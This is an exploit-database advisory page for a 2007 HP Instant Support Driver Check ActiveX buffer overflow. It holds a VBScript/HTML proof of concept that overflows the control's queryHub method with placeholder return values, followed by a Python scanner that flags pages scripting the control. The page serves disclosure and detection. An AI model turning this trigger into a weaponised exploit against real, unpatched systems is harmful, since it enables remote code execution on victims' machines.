Vendor: HP Instant Support - Driver Check
By: Carlo Di Dato (aka shinnai)
CVSS: 7.5 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: HP Instant Support - Driver Check
Affected Version From:
Affected Version To:
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP Professional SP2
2007

HP Instant Support – Driver Check Remote Buffer Overflow Exploit

This exploit takes advantage of a buffer overflow vulnerability in HP Instant Support - Driver Check. By sending specially crafted HTML, an attacker can cause a remote buffer overflow and potentially execute arbitrary code on the target system.

Mitigation:

HP has released a security bulletin addressing this vulnerability. It is recommended to apply the provided patch or update to a version that is not affected by this issue.
Source

Exploit-DB raw data:

----------------------------------------------------------------------------------
 HP Instant Support - Driver Check Remote Buffer Overflow Exploit

 author: Carlo Di Dato (aka shinnai)
 mail: shinnai[at]autistici[dot]org
 site: http://shinnai.altervista.org
 Tested on Windows XP Professional SP2 full patched with IE7

 Special thanks to:
 rgod for his support and friendship
 John Morris from HP Software Security for his honesty
 str0ke... for being str0ke :)

 HP Security Bulletin:
 http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01077597
----------------------------------------------------------------------------------

 <html>
 <object classid='clsid:156BF4B7-AE3A-4365-BD88-95A75AF8F09D' id='test'></object>
  <script language = 'vbscript'>
   
   buff             = String(222, "A")

   get_EBP          = "cccc"

   get_EIP          = unescape("aaaa")

   buf1             = unescape("bbbb")

   second_exception = unescape("%00%00%92%00")

   first_exception  = unescape("%00%00%92%00")

   buf2             = String(4000, "B")

   egg              = buff + get_EBP + get_EIP + buf1 + second_exception + first_exception + buf2

   test.queryHub egg
 
 </script>
</html>

# milw0rm.com [2007-07-02]
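
For detection, the two identifiers visible in the proof of concept above, the control's CLSID and the queryHub method, are enough to flag pages that load and script the control. The scanner below is an added example, not part of the original exploit or of HP's bulletin; the names ControlFinder and scan and both sample documents are constructed for illustration.

```python
import re
from html.parser import HTMLParser

# CLSID and method name come from the proof of concept on this page.
CLSID = "156BF4B7-AE3A-4365-BD88-95A75AF8F09D"
METHOD = "queryHub"


class ControlFinder(HTMLParser):
    """Records <object> tags whose classid is the Driver Check control."""

    def __init__(self):
        super().__init__()
        self.loads_control = False
        self.object_ids = []  # id attributes that scripts can use to reach it

    def handle_starttag(self, tag, attrs):
        if tag != "object":
            return
        a = {k: (v or "") for k, v in attrs}
        # Normalise "CLSID:{...}" / "clsid:..." to the bare lowercase GUID.
        classid = a.get("classid", "").lower().replace("clsid:", "").strip(" {}")
        if classid == CLSID.lower():
            self.loads_control = True
            if a.get("id"):
                self.object_ids.append(a["id"])


def scan(html):
    """Report whether a document loads the control and which ids call METHOD."""
    finder = ControlFinder()
    finder.feed(html)
    finder.close()
    # VBScript is case-insensitive, so match "<id>.queryHub" ignoring case.
    calls = [i for i in finder.object_ids
             if re.search(r"\b%s\s*\.\s*%s\b" % (re.escape(i), METHOD), html, re.I)]
    return {"loads_control": finder.loads_control, "calls_method": calls}


# Constructed samples: one scripts the control, one loads an unrelated control.
SUSPECT = """<html><object classid="CLSID:156bf4b7-ae3a-4365-bd88-95a75af8f09d" id="hp"></object>
<script language="vbscript">
  HP.QueryHub "placeholder"
</script></html>"""
BENIGN = """<html><object classid="clsid:00000000-0000-0000-0000-000000000000" id="x"></object>
<script>x.queryHub("a")</script></html>"""

if __name__ == "__main__":
    print(scan(SUSPECT), scan(BENIGN))
```

A hit on loads_control alone is worth reviewing on hosts that still have the unpatched control installed, since the method can also be reached through script that this simple id match does not cover.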